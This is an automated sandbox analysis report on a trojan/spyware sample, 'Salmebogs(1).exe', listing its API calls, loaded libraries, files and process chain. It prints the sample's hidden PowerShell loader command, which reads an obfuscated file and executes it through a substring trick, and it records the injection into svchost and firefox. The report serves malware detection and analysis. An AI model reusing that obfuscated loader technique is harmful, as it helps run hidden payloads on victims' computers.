            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03472F90 NtProtectVirtualMemory,8_2_03472F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03472FA0 NtQuerySection,8_2_03472FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03472E30 NtWriteVirtualMemory,8_2_03472E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03472EA0 NtAdjustPrivilegesToken,8_2_03472EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03473D70 NtOpenThread,8_2_03473D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03472D00 NtSetInformationFile,8_2_03472D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03473D10 NtOpenProcessToken,8_2_03473D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03472DB0 NtEnumerateKey,8_2_03472DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03472C00 NtQueryInformationProcess,8_2_03472C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03472CC0 NtQueryVirtualMemory,8_2_03472CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03472CF0 NtOpenProcess,8_2_03472CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00779230 NtCreateFile,8_2_00779230
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00779390 NtReadFile,8_2_00779390
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00779480 NtDeleteFile,8_2_00779480
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00779520 NtClose,8_2_00779520
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00779670 NtAllocateVirtualMemory,8_2_00779670
            Source: C:\Users\user\Desktop\Salmebogs(1).exeCode function: 0_2_0040327D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040327D
            Source: C:\Users\user\Desktop\Salmebogs(1).exeCode function: 0_2_00404B080_2_00404B08
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22A752A06_2_22A752A0
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22B112ED6_2_22B112ED
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeCode function: 7_2_02FB49727_2_02FB4972
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeCode function: 7_2_02FB4B107_2_02FB4B10
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeCode function: 7_2_02FB4B047_2_02FB4B04
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeCode function: 7_2_02FB69C07_2_02FB69C0
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeCode function: 7_2_02FBD1A07_2_02FBD1A0
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeCode function: 7_2_02FD56907_2_02FD5690
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeCode function: 7_2_02FB67A07_2_02FB67A0
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeCode function: 7_2_02FB67977_2_02FB6797
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeCode function: 7_2_02FAAD227_2_02FAAD22
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342D34C8_2_0342D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034FA3528_2_034FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F132D8_2_034F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0344E3F08_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_035003E68_2_035003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0348739A8_2_0348739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E02748_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0345B2C08_2_0345B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E12ED8_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034452A08_2_034452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0347516C8_2_0347516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F1728_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0350B16B8_2_0350B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034301008_2_03430100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034DA1188_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F81CC8_2_034F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0344B1B08_2_0344B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_035001AA8_2_035001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034EF0CC8_2_034EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034470C08_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F70E98_2_034F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034FF0E08_2_034FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034647508_2_03464750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034407708_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0343C7C08_2_0343C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034FF7B08_2_034FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F16CC8_2_034F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0345C6E08_2_0345C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F75718_2_034F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034405358_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_035005918_2_03500591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034DD5B08_2_034DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F24468_2_034F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034314608_2_03431460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034FF43F8_2_034FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034EE4F68_2_034EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034FAB408_2_034FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034FFB768_2_034FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F6BD78_2_034F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0347DBF98_2_0347DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0345FB808_2_0345FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034FFA498_2_034FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F7A468_2_034F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B3A6C8_2_034B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034EDAC68_2_034EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0343EA808_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034DDAAC8_2_034DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03485AA08_2_03485AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034499508_2_03449950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0345B9508_2_0345B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034569628_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034429A08_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0350A9A68_2_0350A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034428408_2_03442840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0344A8408_2_0344A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034438E08_2_034438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0346E8F08_2_0346E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034268B88_2_034268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B4F408_2_034B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034FFF098_2_034FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03482F288_2_03482F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03460F308_2_03460F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03432FC88_2_03432FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0344CFE08_2_0344CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03441F928_2_03441F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034FFFB18_2_034FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03440E598_2_03440E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034FEE268_2_034FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034FEEDB8_2_034FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03452E908_2_03452E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034FCE938_2_034FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03449EB08_2_03449EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03443D408_2_03443D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F1D5A8_2_034F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F7D738_2_034F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0344AD008_2_0344AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0345FDC08_2_0345FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0343ADE08_2_0343ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03458DBF8_2_03458DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03440C008_2_03440C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B9C328_2_034B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03430CF28_2_03430CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034FFCF28_2_034FFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E0CB58_2_034E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03103F088_2_03103F08
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00761D708_2_00761D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_007511B28_2_007511B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_007654308_2_00765430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_007636308_2_00763630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0077BB208_2_0077BB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0075CC308_2_0075CC30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0075CC278_2_0075CC27
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0075AE508_2_0075AE50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0075CE508_2_0075CE50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0075AFA08_2_0075AFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0075AF948_2_0075AF94
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034AEA12 appears 84 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0342B970 appears 266 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03475130 appears 36 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03487E54 appears 88 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034BF290 appears 105 times
            Source: Salmebogs(1).exe, 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameeftervisninger luftfartjs.exe0 vs Salmebogs(1).exe
            Source: Salmebogs(1).exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/12@8/7
            Source: C:\Users\user\Desktop\Salmebogs(1).exeCode function: 0_2_0040327D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040327D
            Source: C:\Users\user\Desktop\Salmebogs(1).exeCode function: 0_2_0040458C GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_0040458C
            Source: C:\Users\user\Desktop\Salmebogs(1).exeCode function: 0_2_00402095 CoCreateInstance,0_2_00402095
            Source: C:\Users\user\Desktop\Salmebogs(1).exeFile created: C:\Users\user\AppData\Roaming\aspernJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3664:120:WilError_03
            Source: C:\Users\user\Desktop\Salmebogs(1).exeFile created: C:\Users\user\AppData\Local\Temp\nssFA60.tmpJump to behavior
            Source: Salmebogs(1).exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
            Source: C:\Users\user\Desktop\Salmebogs(1).exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Salmebogs(1).exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Salmebogs(1).exeReversingLabs: Detection: 21%
            Source: C:\Users\user\Desktop\Salmebogs(1).exeFile read: C:\Users\user\Desktop\Salmebogs(1).exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Salmebogs(1).exe "C:\Users\user\Desktop\Salmebogs(1).exe"
            Source: C:\Users\user\Desktop\Salmebogs(1).exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede\Neuralgiform.Pre';$Unclog242=$Skopudsningernes.SubString(72152,3);.$Unclog242($Skopudsningernes)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe "C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe"
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\SysWOW64\svchost.exe"
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Salmebogs(1).exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede\Neuralgiform.Pre';$Unclog242=$Skopudsningernes.SubString(72152,3);.$Unclog242($Skopudsningernes)Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe "C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe"Jump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\SysWOW64\svchost.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Salmebogs(1).exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Salmebogs(1).exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Salmebogs(1).exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Salmebogs(1).exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Salmebogs(1).exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Salmebogs(1).exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Salmebogs(1).exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\Salmebogs(1).exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Salmebogs(1).exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Salmebogs(1).exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Salmebogs(1).exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Salmebogs(1).exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Salmebogs(1).exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Salmebogs(1).exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Salmebogs(1).exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Salmebogs(1).exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Salmebogs(1).exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Salmebogs(1).exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Salmebogs(1).exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Salmebogs(1).exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Salmebogs(1).exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Salmebogs(1).exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Salmebogs(1).exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Salmebogs(1).exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
